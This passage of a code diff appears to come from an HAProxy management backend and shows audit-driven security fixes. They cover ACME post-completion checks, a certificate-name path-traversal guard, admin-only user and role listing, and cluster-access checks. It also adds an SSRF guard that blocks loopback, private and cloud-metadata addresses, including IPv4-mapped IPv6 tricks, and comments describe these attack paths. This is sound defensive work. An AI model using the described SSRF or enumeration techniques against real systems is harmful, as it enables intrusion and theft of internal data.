# `wizard_staged` and post-completion. With the previous
# code path:
#
# - check_bind_port_collision would find no frontends
# for the missing cluster (returns None — no
# collision)
# - the backend-existence check would correctly flag
# `backend_missing` IF a default_backend was set,
# but actions without `default_backend` (legacy
# payloads, TCP-mode wizard runs) would proceed to
# create_frontend_row pointing at a dead
# cluster_id, then fail with a FK violation that
# surfaces only in the logs.
#
# Catch this upfront with the same shape as the
# `backend_missing` outcome so the operator sees a
# clear "cluster removed — re-run the wizard" message
# in the order's activity log instead of a generic
# FK error.
cluster_row = await conn.fetchrow(
"SELECT id FROM haproxy_clusters "
"WHERE id = $1 AND is_active = TRUE",
cluster_id,
)
if cluster_row is None:
action["error"] = "cluster_missing"
action["error_detail"] = (
f"Cluster id={cluster_id} no longer exists "
"(or was deactivated) — the wizard's target "
"cluster was removed after the ACME order "
"was staged. Cert was issued but no HTTPS "
"frontend was created. Re-run the wizard "
"against an active cluster, or assign the "
"issued cert to a frontend manually."
)
await record_event(
order_id,
"post_completion_action_skipped",
severity="ERROR",
message=action["error_detail"],
details={
"action_index": idx,
"type": action_type,
"missing_cluster_id": cluster_id,
},
conn=conn,
)
outcomes.append({
"index": idx, "status": "error",
"reason": "cluster_missing",
"detail": action["error_detail"],
})
continue
# M21/R35: re-check port collision pre-INSERT
collision = await check_bind_port_collision(
conn, cluster_id, bind_address, bind_port
)
if collision:
action["error"] = "port_collision"
action["error_detail"] = (
f"bind {bind_address}:{bind_port} already used by frontend id={collision}"
)
await record_event(
order_id,
"post_completion_action_skipped",
severity="ERROR",
message=action["error_detail"],
details={"action_index": idx, "type": action_type},
conn=conn,
)
outcomes.append({
"index": idx, "status": "error",
"reason": "port_collision",
"detail": action["error_detail"],
})
continue
# Bulgu #31 (round-13 audit) — referenced default_backend
# MUST still exist before we insert the deferred HTTPS
# frontend. The wizard's HTTP frontend + backend are
# created at submit time and become part of the
# `bulk-site-create-<ts>` config version's snapshot. If
# the operator REJECTS that version between apply and
# post-completion, the snapshot rollback deletes the
# backend rows. `create_frontend_row` would still
# happily INSERT this HTTPS frontend with
# `default_backend='be_xxx'` — and HAProxy then refuses
# to load the config at the next apply with:
#
# [ALERT] : Proxy 'fe_xxx-https' references unknown
# backend 'be_xxx'.
#
# Operator sees an unrecoverable "config parse error"
# AFTER the cert was already issued and the order
# marked 'valid' — leaving an orphan cert and a
# locked-up apply queue. Bail early with a clear
# message so the operator can re-run the wizard or
# create the HTTPS frontend manually pointing at a
# different backend.
default_be_name = fe_cfg.get("default_backend")
if default_be_name:
be_row = await conn.fetchrow(
"SELECT id FROM backends "
"WHERE cluster_id = $1 AND name = $2",
cluster_id,
default_be_name,
)
if be_row is None:
action["error"] = "backend_missing"
action["error_detail"] = (
f"default_backend='{default_be_name}' no "
f"longer exists in cluster {cluster_id} "
"— the wizard's bulk-site-create version "
"was likely rejected after issuance. "
"Cert was issued but no HTTPS frontend "
"was created. Re-run the wizard or "
"create the HTTPS frontend manually."
)
await record_event(
order_id,
"post_completion_action_skipped",
severity="ERROR",
message=action["error_detail"],
details={
"action_index": idx,
"type": action_type,
"missing_backend": default_be_name,
},
conn=conn,
)
outcomes.append({
"index": idx, "status": "error",
"reason": "backend_missing",
"detail": action["error_detail"],
})
continue
# v1.5.0 R12 — Pydantic-light shim with FULL field
# surface. create_frontend_row reads every attribute
# via getattr(payload, X, None), so we MUST forward
# every advanced TLS / HSTS / header field the wizard
# may have stored on frontend_config. Earlier versions
# of this shim only listed a handful of fields, which
# silently dropped HSTS / ALPN / TLS-version /
# compression preferences for ACME-issued HTTPS
# frontends — visible to the user as "I enabled HSTS
# but the frontend doesn't have it" after the LE order
# completed.
from types import SimpleNamespace
fe_payload = SimpleNamespace(
# core
name=fe_name,
bind_address=bind_address,
bind_port=bind_port,
default_backend=fe_cfg.get("default_backend"),
mode=fe_cfg.get("mode", "http"),
ssl_enabled=True,
# routing rules
acl_rules=fe_cfg.get("acl_rules", []),
redirect_rules=fe_cfg.get("redirect_rules", []),
use_backend_rules=fe_cfg.get("use_backend_rules", []),
# tcp-mode
tcp_request_rules=fe_cfg.get("tcp_request_rules"),
# timeouts + capacity
timeout_client=fe_cfg.get("timeout_client"),
timeout_http_request=fe_cfg.get("timeout_http_request"),
maxconn=fe_cfg.get("maxconn"),
rate_limit=fe_cfg.get("rate_limit"),
# observability + traffic shaping
compression=fe_cfg.get("compression"),
log_separate=fe_cfg.get("log_separate"),
monitor_uri=fe_cfg.get("monitor_uri"),
# header injection (HSTS lands here)
request_headers=fe_cfg.get("request_headers"),
response_headers=fe_cfg.get("response_headers"),
# raw HAProxy options (free-form lines)
options=fe_cfg.get("options"),
# advanced TLS — HAProxy 2.4+ bind directives
ssl_alpn=fe_cfg.get("ssl_alpn"),
ssl_npn=fe_cfg.get("ssl_npn"),
ssl_ciphers=fe_cfg.get("ssl_ciphers"),
ssl_ciphersuites=fe_cfg.get("ssl_ciphersuites"),
ssl_min_ver=fe_cfg.get("ssl_min_ver"),
ssl_max_ver=fe_cfg.get("ssl_max_ver"),
ssl_strict_sni=fe_cfg.get("ssl_strict_sni"),
# R17 minimum-parity: ssl_verify (mTLS client auth)
# was already in the SimpleNamespace forwarding list
# but the wizard's SSLChoice now actually populates
# it. No code change here, but call out the contract:
# SimpleNamespace.ssl_verify must reach
# create_frontend_row's HAProxy bind generation.
ssl_verify=fe_cfg.get("ssl_verify"),
ssl_port=fe_cfg.get("ssl_port"),
ssl_cert_path=fe_cfg.get("ssl_cert_path"),
ssl_cert=fe_cfg.get("ssl_cert"),
)
new_fe_id = await create_frontend_row(
conn,
fe_payload,
cluster_id,
ssl_certificate_id=cert_id,
ssl_enabled=True,
mark_pending=True,
)
action["executed_at"] = datetime.utcnow().isoformat() + "Z"
action["created_frontend_id"] = new_fe_id
# Persist the executed_at flag back to the order (idempotency)
await conn.execute(
"""
UPDATE letsencrypt_orders
SET post_completion_actions = $1::jsonb, updated_at = NOW()
WHERE id = $2
""",
json.dumps(actions),
order_id,
)
# Generate a fresh PENDING config_version so the new
# HTTPS frontend can be applied.
try:
# R18c audit fix (round 1 #4 — KRITIK): pass
# the active transaction connection into the
# config generator. Pre-fix the call obtained
# a SECOND pooled connection, which under
# PostgreSQL READ COMMITTED cannot see the
# uncommitted INSERT that just created the
# HTTPS frontend in this same transaction.
# Result: the new HTTPS frontend was silently
# OMITTED from the post-completion
# config_versions snapshot, so when the
# operator (or auto-apply) deployed the
# ACME-completed config, HAProxy reloaded
# WITHOUT the HTTPS bind for the freshly-
# issued cert. Operator saw "ACME success"
# but the cert never went live until the
# next manual config consolidation.
from services.haproxy_config import generate_haproxy_config_for_cluster
cfg = await generate_haproxy_config_for_cluster(cluster_id, conn)
import hashlib
cfg_hash = hashlib.sha256(cfg.encode()).hexdigest()
ts = int(time.time())
version_name = f"acme-post-https-{cert_id}-{ts}"
await conn.execute(
"""
INSERT INTO config_versions (
cluster_id, version_name, config_content, checksum,
is_active, status, description
) VALUES ($1, $2, $3, $4, FALSE, 'PENDING', $5)
""",
cluster_id,
version_name,
cfg,
cfg_hash,
f"ACME post-completion: HTTPS frontend for cert {cert_id}",
)
except Exception as cfg_err:
logger.warning(
f"[ACME] post_completion config_version creation failed: {cfg_err}"
)
if fe_cfg.get("_auto_apply"):
auto_apply_cluster_ids.add(cluster_id)
if fe_cfg.get("_user_id"):
auto_apply_user_ids.add(fe_cfg["_user_id"])
await record_event(
order_id,
"post_completion_action_executed",
severity="INFO",
message=f"Created HTTPS frontend '{fe_name}' from post_completion_actions",
details={"action_index": idx, "frontend_id": new_fe_id},
conn=conn,
)
outcomes.append({
"index": idx, "status": "ok",
"frontend_id": new_fe_id,
"type": action_type,
})
else:
outcomes.append({
"index": idx, "status": "skipped",
"reason": f"unknown action type: {action_type}",
})
except Exception as action_err:
logger.error(f"[ACME] post_completion action {idx} failed: {action_err}", exc_info=True)
outcomes.append({"index": idx, "status": "error", "reason": str(action_err)})
try:
await record_event(
order_id,
"post_completion_action_failed",
severity="ERROR",
message=str(action_err)[:500],
details={"action_index": idx, "type": action_type},
conn=conn,
)
except Exception:
pass
# Auto-apply if requested
if auto_apply_cluster_ids:
try:
from services.apply_service import apply_cluster_pending
for cid in auto_apply_cluster_ids:
# Order's created_by lookup with admin fallback (M23/M46)
user_for_apply = None
if auto_apply_user_ids:
user_for_apply = next(iter(auto_apply_user_ids))
if user_for_apply is None:
order_row = await conn.fetchrow(
"SELECT created_by FROM letsencrypt_orders WHERE id = $1",
order_id,
)
if order_row:
user_for_apply = order_row["created_by"]
# apply_service handles None via is_admin fallback
try:
apply_res = await apply_cluster_pending(cid, user_id=user_for_apply)
await record_event(
order_id,
"post_completion_auto_apply",
severity="INFO",
message=f"Auto-applied cluster {cid} after post_completion_actions",
details={"latest_version": apply_res.get("latest_version")},
conn=conn,
)
except Exception as apply_err:
logger.error(
f"[ACME] post_completion auto-apply for cluster {cid} failed: {apply_err}"
)
await record_event(
order_id,
"post_completion_auto_apply_failed",
severity="ERROR",
message=str(apply_err)[:500],
details={"cluster_id": cid},
conn=conn,
)
except Exception as outer_apply_err:
logger.error(f"[ACME] post_completion auto-apply outer failure: {outer_apply_err}")
return outcomes
async def _auto_apply_renewal(cert_id: int, cluster_ids: list):
"""Trigger the same Apply mechanism used by manual Apply for SSL renewals.
File diff suppressed because it is too large Load Diff
+279 -23
View File
@@ -2,6 +2,7 @@ from fastapi import APIRouter, HTTPException, Request, Header, Depends
from typing import List, Optional
import logging
import hashlib
import re
import time
import json
from datetime import datetime, timezone
@@ -17,6 +18,80 @@ from services.haproxy_config import generate_haproxy_config_for_cluster
router = APIRouter(prefix="/api/ssl", tags=["SSL Certificates"])
logger = logging.getLogger(__name__)
# Bulgu #63 (round-22 audit) — handler-level enforcement of the
# SSL certificate name path-traversal guard. Previously lived as a
# Pydantic validator on `SSLCertificateUpdate.name` (Bulgu #21,
# round-11). Operators with legacy certificate names containing
# forbidden characters (e.g. `*.example.com`, `cert (1).pem`,
# `wildcard ssl.pem`) were locked out of updating any other field
# — the model validator fired before the route body even ran. The
# create + update routes now invoke `_assert_safe_cert_name` with
# explicit grandfathering on UPDATE.
_SAFE_CERT_NAME_PATTERN = re.compile(r"^[A-Za-z0-9_.-]+$")
def _assert_safe_cert_name(name: Optional[str]) -> None:
"""Strict path-traversal guard for SSL certificate names.
Identical contract to the original Bulgu #21 validator:
* trimmed-non-empty, length <= 200
* only [A-Za-z0-9_.-]
* no ``..`` sequence
* does not start with ``.`` or ``-``
Raises ``HTTPException(400)`` so the caller can let FastAPI
surface the actionable message. Callers that want to skip the
check (e.g. UPDATE with unchanged name) simply omit the call.
"""
if name is None:
return
stripped = name.strip()
if not stripped:
raise HTTPException(
status_code=400,
detail="SSL certificate name must not be empty",
)
if stripped != name:
raise HTTPException(
status_code=400,
detail="SSL certificate name must not contain leading/trailing whitespace",
)
if len(stripped) > 200:
raise HTTPException(
status_code=400,
detail="SSL certificate name must be 200 characters or fewer",
)
if not _SAFE_CERT_NAME_PATTERN.match(stripped):
raise HTTPException(
status_code=400,
detail=(
f"SSL certificate name={name!r} contains forbidden "
"characters — only letters, digits, underscore, "
"hyphen, and dot are allowed."
),
)
if ".." in stripped:
raise HTTPException(
status_code=400,
detail=(
f'SSL certificate name={name!r} must not contain '
f'".." (path traversal)'
),
)
if stripped.startswith("."):
raise HTTPException(
status_code=400,
detail=f'SSL certificate name={name!r} must not start with "."',
)
if stripped.startswith("-"):
raise HTTPException(
status_code=400,
detail=f'SSL certificate name={name!r} must not start with "-"',
)
async def validate_user_cluster_access(user_id: int, cluster_id: int, conn):
"""Validate that user has access to the specified cluster"""
# Check if cluster exists
@@ -90,7 +165,11 @@ async def validate_user_cluster_access(user_id: int, cluster_id: int, conn):
return True
@router.get("/certificates", response_model=List[dict], summary="Get SSL Certificates", response_description="List of SSL certificates")
async def get_ssl_certificates(cluster_id: Optional[int] = None, usage_type: Optional[str] = None):
async def get_ssl_certificates(
cluster_id: Optional[int] = None,
usage_type: Optional[str] = None,
authorization: str = Header(None),
):
"""
# Get SSL Certificates
@@ -120,10 +199,38 @@ async def get_ssl_certificates(cluster_id: Optional[int] = None, usage_type: Opt
}
]
```
R18 audit fix: enforce authentication on the LIST endpoint and
cluster-scoped authorization when `cluster_id` is provided. Pre-R18
this route was anonymously accessible — any client could enumerate
cert metadata across the whole installation, which broke the
multi-tenant guarantee in `validate_user_cluster_access`. The
detail / create / update / delete routes were already authenticated
individually; this fix closes the LIST gap.
"""
# R18 audit (round 4 fix): authenticate BEFORE opening any DB
# connection. Pre-fix the endpoint opened the pool first then
# checked auth, which produced confusing 500s on transient DB
# issues for unauthenticated callers (and worse: leaked the
# presence of the pool to anonymous probes).
current_user = await get_current_user_from_token(authorization)
# R18 audit (round 6 fix): single try/finally lifecycle for the
# connection. Pre-fix the function had nested try blocks that each
# called `close_database_connection(conn)` — releasing the same
# asyncpg handle twice if any exception bubbled past the inner
# release. Pattern now: one acquire, one release in finally,
# regardless of which branch raises or returns. `conn = None`
# pre-binding still required so the finally is safe when the
# acquire itself raises (DB pool down / pool typo).
conn = None
try:
conn = await get_database_connection()
if current_user and cluster_id:
# Cluster-scoped enumeration must respect cluster access.
# Re-raises HTTPException(403/404) cleanly; finally below
# releases the connection.
await validate_user_cluster_access(current_user["id"], cluster_id, conn)
# First check if ssl_certificates table exists
try:
table_exists = await conn.fetchval("""
@@ -134,7 +241,6 @@ async def get_ssl_certificates(cluster_id: Optional[int] = None, usage_type: Opt
""")
if not table_exists:
await close_database_connection(conn)
logger.info("SSL certificates table does not exist yet - returning empty list")
return []
@@ -229,8 +335,12 @@ async def get_ssl_certificates(cluster_id: Optional[int] = None, usage_type: Opt
ORDER BY created_at DESC
""", *params)
await close_database_connection(conn)
# R18 audit (round 6 fix): defer the connection release to
# the outer `finally` — the post-query `for cert in
# certificates:` loop must not run on a released handle,
# but if it raises we don't want a double-release on the
# outer handler either.
# Convert to list of dicts with new schema fields
result = []
for cert in certificates:
@@ -272,29 +382,35 @@ async def get_ssl_certificates(cluster_id: Optional[int] = None, usage_type: Opt
return result
except HTTPException:
# Re-raise typed HTTP errors (e.g. cluster access 403/404)
# without the broad-except remap below. The outer finally
# still releases the connection.
raise
except Exception as table_error:
logger.error(f"SSL LIST ERROR: Query failed for cluster_id={cluster_id}, usage_type={usage_type}: {table_error}", exc_info=True)
try:
await close_database_connection(conn)
except:
pass
raise HTTPException(
status_code=500,
detail=f"Failed to fetch SSL certificates. Please check server logs. Error: {str(table_error)}"
)
except HTTPException:
raise
except Exception as e:
logger.error(f"SSL LIST ERROR: Connection/setup failed: {e}", exc_info=True)
try:
await close_database_connection(conn)
except:
pass
raise HTTPException(
status_code=500,
detail=f"Failed to fetch SSL certificates: {str(e)}"
)
finally:
# R18 audit (round 6 fix): single canonical release point.
# Idempotent because of the `conn is not None` guard — a no-op
# if `get_database_connection()` itself raised before assignment.
if conn is not None:
try:
await close_database_connection(conn)
except Exception:
pass
@router.post("/certificates")
async def create_ssl_certificate(certificate: SSLCertificateCreate, request: Request, authorization: str = Header(None)):
@@ -311,7 +427,13 @@ async def create_ssl_certificate(certificate: SSLCertificateCreate, request: Req
status_code=403,
detail="Insufficient permissions: ssl.create required"
)
# Bulgu #63 (round-22 audit) — strict path-traversal guard on
# CREATE. Mirrors the original Bulgu #21 validator; the
# equivalent check was moved out of the model so the UPDATE
# path can grandfather legacy names.
_assert_safe_cert_name(certificate.name)
conn = await get_database_connection()
# Validate cluster access for multi-cluster security
@@ -779,6 +901,17 @@ async def update_ssl_certificate(cert_id: int, certificate: SSLCertificateUpdate
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="SSL certificate not found")
# Bulgu #63 (round-22 audit) — grandfather the existing
# certificate name. Only enforce the path-traversal guard
# when the operator actually renames the cert. If they
# leave `name` at its current value (or omit it), let the
# update proceed regardless of whether the legacy name
# conforms to the post-Bulgu-#21 character set. Otherwise
# legacy uploads with `cert (1).pem` / `*.example.com` etc.
# would be permanently un-updatable from the manual SSL UI.
if certificate.name is not None and certificate.name != existing["name"]:
_assert_safe_cert_name(certificate.name)
# Protect ACME-managed certificates from manual content edits
if existing.get('source') == 'letsencrypt':
content_fields_changed = any([
@@ -1165,13 +1298,51 @@ async def update_ssl_certificate(cert_id: int, certificate: SSLCertificateUpdate
raise HTTPException(status_code=500, detail=str(e))
@router.delete("/certificates/{cert_id}")
async def delete_ssl_certificate(cert_id: int, request: Request, authorization: str = Header(None)):
"""Delete SSL certificate"""
async def delete_ssl_certificate(
cert_id: int,
request: Request,
force: bool = False,
authorization: str = Header(None),
):
"""Delete SSL certificate.
Bulgu #74 (round-22 audit) — pre-fix this handler did a hard
`DELETE FROM ssl_certificates WHERE id=$1` without ANY
referential check. The `frontends` table carries the cert
reference in two places — `ssl_certificate_id` (legacy
single-cert column) and `ssl_certificate_ids` JSONB array
(multi-cert support) — and NEITHER has a database-level
foreign-key constraint, so the cert vanished and the
referencing rows kept the now-dangling integer. The next
config regen then either:
* silently dropped the bind line and the frontend went from
HTTPS to HTTP (silent security downgrade), OR
* rendered `bind :443 ssl crt /etc/ssl/haproxy/<gone>.pem`
which the agent's `haproxy -c` rejected at reload time,
breaking the entire cluster's config-apply pipeline.
Either failure mode was hard to attribute back to the cert
deletion long after the fact.
The new contract:
* **default**: 409 Conflict if any active frontend / backend
server still references the cert; the response body lists
the offending entities so the operator can detach the
cert from each one first.
* **`?force=true`**: NULL out the references (both legacy
column and JSONB array) BEFORE deleting the row,
emitting a clear audit-log warning per affected
frontend. The frontends are marked PENDING so the next
apply re-renders without the cert.
ACME-managed certs (`letsencrypt_order_id IS NOT NULL`) keep
their `ON DELETE SET NULL` FK on `letsencrypt_orders`, but we
also surface a warning so the operator knows the renewal
loop will re-issue if the order is still active.
"""
try:
# Get current user for activity logging
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
# Check permission for SSL delete
has_permission = await check_user_permission(current_user["id"], "ssl", "delete")
if not has_permission:
@@ -1179,19 +1350,104 @@ async def delete_ssl_certificate(cert_id: int, request: Request, authorization:
status_code=403,
detail="Insufficient permissions: ssl.delete required"
)
conn = await get_database_connection()
# Check if certificate exists and get cluster_id
certificate = await conn.fetchrow("SELECT name, cluster_id FROM ssl_certificates WHERE id = $1", cert_id)
if not certificate:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="SSL certificate not found")
cluster_id = certificate['cluster_id']
cert_name = certificate['name']
logger.info(f"SSL certificate delete: cert_id={cert_id}, name={cert_name}, cluster_id={cluster_id}")
logger.info(f"SSL certificate delete: cert_id={cert_id}, name={cert_name}, cluster_id={cluster_id}, force={force}")
# Bulgu #74 — referential check across both legacy and
# multi-cert columns + backend-server SSL references.
frontend_refs = await conn.fetch("""
SELECT id, name, cluster_id
FROM frontends
WHERE is_active = TRUE
AND (ssl_certificate_id = $1
OR ssl_certificate_ids @> to_jsonb($1::int))
ORDER BY cluster_id, name
""", cert_id)
backend_server_refs = await conn.fetch("""
SELECT id, server_name, backend_name, cluster_id
FROM backend_servers
WHERE is_active = TRUE AND ssl_certificate_id = $1
ORDER BY cluster_id, backend_name, server_name
""", cert_id)
if (frontend_refs or backend_server_refs) and not force:
await close_database_connection(conn)
fe_list = [
{"id": r["id"], "name": r["name"], "cluster_id": r["cluster_id"]}
for r in frontend_refs
]
be_list = [
{
"id": r["id"], "server_name": r["server_name"],
"backend_name": r["backend_name"],
"cluster_id": r["cluster_id"],
}
for r in backend_server_refs
]
raise HTTPException(
status_code=409,
detail={
"message": (
f"SSL certificate '{cert_name}' is still in use by "
f"{len(fe_list)} frontend(s) and {len(be_list)} backend "
f"server(s). Detach the certificate from each one first, "
f"or call DELETE again with ?force=true to NULL the "
f"references and proceed (this will mark every affected "
f"entity as PENDING and silently drop the HTTPS bind "
f"on `force` — only use force when you've verified "
f"the certificate is no longer needed)."
),
"frontends": fe_list,
"backend_servers": be_list,
},
)
if force and (frontend_refs or backend_server_refs):
logger.warning(
f"SSL DELETE FORCE: cert_id={cert_id} name={cert_name!r} — "
f"nulling references in {len(frontend_refs)} frontend(s) "
f"and {len(backend_server_refs)} backend server(s)"
)
# Clear legacy single-cert column.
await conn.execute("""
UPDATE frontends
SET ssl_certificate_id = NULL,
last_config_status = 'PENDING',
updated_at = CURRENT_TIMESTAMP
WHERE ssl_certificate_id = $1
""", cert_id)
# Clear the multi-cert JSONB array entry. `-` operator
# on JSONB removes ALL occurrences of the integer.
await conn.execute("""
UPDATE frontends
SET ssl_certificate_ids = COALESCE(ssl_certificate_ids, '[]'::jsonb)
- $1::text,
last_config_status = 'PENDING',
updated_at = CURRENT_TIMESTAMP
WHERE ssl_certificate_ids @> to_jsonb($1::int)
""", str(cert_id))
# backend_servers.ssl_certificate_id has an
# `ON DELETE SET NULL` FK constraint, so the DELETE
# below will null it. We still bump
# `last_config_status` so the next apply re-renders.
for srv in backend_server_refs:
await conn.execute("""
UPDATE backend_servers
SET last_config_status = 'PENDING',
updated_at = CURRENT_TIMESTAMP
WHERE id = $1
""", srv['id'])
# Delete certificate
await conn.execute("DELETE FROM ssl_certificates WHERE id = $1", cert_id)
+79 -5
View File
@@ -17,7 +17,22 @@ async def get_users(authorization: str = Header(None)):
try:
# Verify authentication
current_user = await get_current_user_from_token(authorization)
# R18c audit fix (round 5 #1 — KRITIK info leak): the only
# caller in the UI today is the admin User Management page;
# the endpoint exposes username, email, phone, full_name,
# is_admin, roles[], cluster_ids and timestamps for every
# active operator on the platform. Pre-fix any
# authenticated user (cluster reader, ssl reader, etc.)
# could enumerate the full operator roster, including
# admin emails for phishing and is_admin flags for target
# selection. Restrict to admins.
if not current_user.get("is_admin"):
raise HTTPException(
status_code=403,
detail="Listing all users requires administrator privileges."
)
conn = await get_database_connection()
# Get users with their roles (only active users)
@@ -88,7 +103,20 @@ async def get_roles(authorization: str = Header(None)):
try:
# Verify authentication
current_user = await get_current_user_from_token(authorization)
# R18c audit fix (round 5 #2 — KRITIK info leak): the role
# listing exposes the FULL `permissions` blob and
# `cluster_ids` for every role. Pre-fix any authenticated
# user could read the platform's RBAC layout — invaluable
# reconnaissance for an attacker planning a privilege
# escalation. Mutations on this endpoint are admin-only;
# the read path now matches.
if not current_user.get("is_admin"):
raise HTTPException(
status_code=403,
detail="Listing roles requires administrator privileges."
)
conn = await get_database_connection()
# Check if roles table exists and get roles
@@ -475,9 +503,28 @@ async def change_user_password(
async def delete_server_global(server_id: int, request: Request, authorization: str = Header(None)):
"""Delete a server by ID - global endpoint for UI compatibility"""
try:
from auth_middleware import get_current_user_from_token
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
# Risk-audit follow-up to Bulgu-#77: the legacy
# `delete_server` on `routers/backend.py` was upgraded to
# gate on `backends.update`, but BackendServers.js calls
# the compatibility alias `DELETE /api/servers/{id}` that
# routes here — so the FE delete path was still missing
# the per-action RBAC check. A read-only operator with
# `backends.read` and pool access could delete servers.
# Mirror the gate so both endpoints enforce the same
# contract.
has_permission = await check_user_permission(
current_user["id"], "backends", "update",
current_user=current_user,
)
if not has_permission:
raise HTTPException(
status_code=403,
detail="You don't have permission to delete servers",
)
# Get request body for cluster_id validation
request_body = await request.json() if hasattr(request, 'json') else {}
expected_cluster_id = request_body.get('cluster_id')
@@ -895,7 +942,34 @@ async def get_user_activity(
"""Get user activity logs"""
try:
current_user = await get_current_user_from_token(authorization)
# R18c audit fix (round 4 #21 — KRITIK info leak): pre-fix
# any authenticated user could:
# 1. Omit `user_id` and fetch the FULL activity log of
# every operator on the platform — including admin
# apply_changes, ACME orders, and (after R18b round 6)
# wizard `apply_error` / `acme_staging_error` blobs.
# 2. Pass an arbitrary `user_id` and read another
# operator's activity stream.
# The wizard's richer audit row makes this leak more
# consequential than before because the JSONB now carries
# operationally sensitive failure details. Restrict the
# endpoint to admins (full access) or to a user querying
# their own rows. Non-admin requests for someone else's
# activity → 403.
is_admin = bool(current_user.get("is_admin"))
own_id = current_user.get("id")
if not is_admin:
if user_id is None:
# Default to the caller's own rows for non-admins;
# the previous unfiltered listing is admin-only.
user_id = own_id
elif user_id != own_id:
raise HTTPException(
status_code=403,
detail="Only administrators can view another user's activity log."
)
conn = await get_database_connection()
# Build query with optional user filter
+17 -3
View File
@@ -550,7 +550,7 @@ async def update_waf_rule(rule_id: int, waf_rule_data: dict, request: Request, a
status_code=403,
detail="Insufficient permissions: waf.update required"
)
conn = await get_database_connection()
existing_rule = await conn.fetchrow("SELECT * FROM waf_rules WHERE id = $1", rule_id)
@@ -558,6 +558,14 @@ async def update_waf_rule(rule_id: int, waf_rule_data: dict, request: Request, a
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="WAF rule not found")
# Bulgu #79 — WAF rules carry an optional cluster_id;
# validate that the operator can touch this cluster
# before mutating the row. WAF rules with cluster_id IS
# NULL are "global" and gated only by `waf.update`.
rule_cluster_id = existing_rule.get('cluster_id') if hasattr(existing_rule, 'get') else existing_rule['cluster_id']
if rule_cluster_id:
await validate_user_cluster_access(current_user['id'], rule_cluster_id, conn)
# Prepare the config dictionary for the update
import json
config = existing_rule['config']
@@ -754,12 +762,18 @@ async def toggle_waf_rule_status(
)
conn = await get_database_connection()
rule = await conn.fetchrow("SELECT * FROM waf_rules WHERE id = $1", rule_id)
if not rule:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="WAF rule not found")
# Bulgu #79 — validate cluster access for cluster-scoped
# WAF rules (global rules pass unconditionally).
rule_cluster_id = rule['cluster_id'] if 'cluster_id' in rule.keys() else None
if rule_cluster_id:
await validate_user_cluster_access(current_user['id'], rule_cluster_id, conn)
# Determine new status based on action
if action == "delete":
new_status = False
+651
View File
@@ -0,0 +1,651 @@
"""
ACME Diagnostics service (Feature A — Issue #13).
Pre-flight & post-failure diagnostics for an ACME order. Each check produces a
structured `{id, label, status, message, details, duration_ms, severity}` row
suitable for an Antd Tabs/Steps display.
Key constraints (Section 3.3 of the v1.5.0 plan):
- DNS resolution uses stdlib socket.gethostbyname_ex via run_in_executor (we
intentionally avoid pulling aiodns as a runtime dep for v1.5.0).
- Port-80 probe is HEAD-only, target locked to the order's domains, success on
HTTP 200 OR 404, warns on egress timeout (don't fail-hard — corp egress
policies often blackhole outbound 80).
- All checks have hard wall-clock timeouts (asyncio.wait_for) to bound impact
on the API event loop.
- humanize_error_detail covers >= 11 RFC8555 problem types and is backwards
compatible with the legacy plain-string error_detail field.
"""
import asyncio
import ipaddress
import json
import logging
import socket
import time
from typing import Any, Dict, List, Optional
import aiohttp
logger = logging.getLogger(__name__)
# R18b audit fix (round 4 #B): SSRF guard for outbound HTTP probes.
# The ACME diagnostics check_port80 helper opens an HTTP HEAD against
# the operator-supplied domain. If that domain resolves to a private
# / loopback / link-local / cloud-metadata IP, the API host becomes a
# request-forwarding primitive: an authenticated operator could
# fingerprint internal services or hit AWS/GCP metadata endpoints by
# pointing DNS at them. Refuse to probe non-public IPs and surface
# the skip in the diagnostic result so the operator knows why.
def _is_public_ip(ip_str: str) -> bool:
"""Return True only for globally-routable IPv4/IPv6 addresses.
Excludes loopback, link-local, RFC1918 private space, multicast,
cloud-metadata IPs (169.254.169.254 falls under link-local), and
reserved blocks. Used by check_port80 before issuing an HTTP
request to operator-supplied hostnames.
"""
try:
ip = ipaddress.ip_address(ip_str)
except (ValueError, TypeError):
return False
# R18c audit fix (round 3 #4 — KRITIK SSRF): normalize IPv4-mapped
# IPv6 addresses to their underlying IPv4 form before
# classification. PRE-FIX an attacker who controlled the
# domain's AAAA record could point it at `::ffff:127.0.0.1`
# (or `::ffff:169.254.169.254` for cloud metadata) and our
# guard would return True because IPv6Address.is_loopback /
# is_private only check the IPv6 address space — they do NOT
# walk into the embedded IPv4 mapping. The guard would then
# let the probe through, creating an SSRF path back into the
# OpenManager host's loopback / cloud metadata service. Always
# unwrap `.ipv4_mapped` first so the IPv4 classification rules
# apply.
if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
ip = ip.ipv4_mapped
if ip.is_loopback or ip.is_link_local or ip.is_private:
return False
if ip.is_multicast or ip.is_reserved or ip.is_unspecified:
return False
return True
async def _all_ips_public(domain: str, *, timeout: float = 5.0) -> tuple[bool, list[str]]:
"""Resolve `domain` and return (all_public, ips). On DNS failure
returns (False, []) — caller should treat as "skip / unable to
verify safety" rather than "probe anyway"."""
try:
info = await _resolve_dns(domain, timeout=timeout)
except Exception:
return (False, [])
ips = info.get("ips", []) or []
if not ips:
return (False, [])
return (all(_is_public_ip(ip) for ip in ips), ips)
# RFC8555 problem types (https://datatracker.ietf.org/doc/html/rfc8555#section-6.7)
# Plus a few extra ACMEv2 additions used in the wild.
_PROBLEM_HUMANIZED: Dict[str, Dict[str, str]] = {
"urn:ietf:params:acme:error:accountDoesNotExist": {
"title": "ACME account not found",
"hint": "The ACME account is missing or has been deactivated. Re-create the LE account from Settings → Let's Encrypt.",
},
"urn:ietf:params:acme:error:badNonce": {
"title": "Stale request nonce",
"hint": "Transient — the next retry should succeed. If it persists, your system clock may be skewed.",
},
"urn:ietf:params:acme:error:badRevocationReason": {
"title": "Invalid revocation reason",
"hint": "The CA rejected the revocation reason code. Use a valid RFC5280 CRLReason.",
},
"urn:ietf:params:acme:error:caa": {
"title": "CAA record forbids issuance",
"hint": "DNS CAA records prevent Let's Encrypt from issuing this certificate. Add 'letsencrypt.org' to the CAA records.",
},
"urn:ietf:params:acme:error:connection": {
"title": "CA could not connect to your server",
"hint": "Let's Encrypt's validators could not reach port 80 from the public internet. Check inbound firewall and routing.",
},
"urn:ietf:params:acme:error:dns": {
"title": "DNS resolution failed during validation",
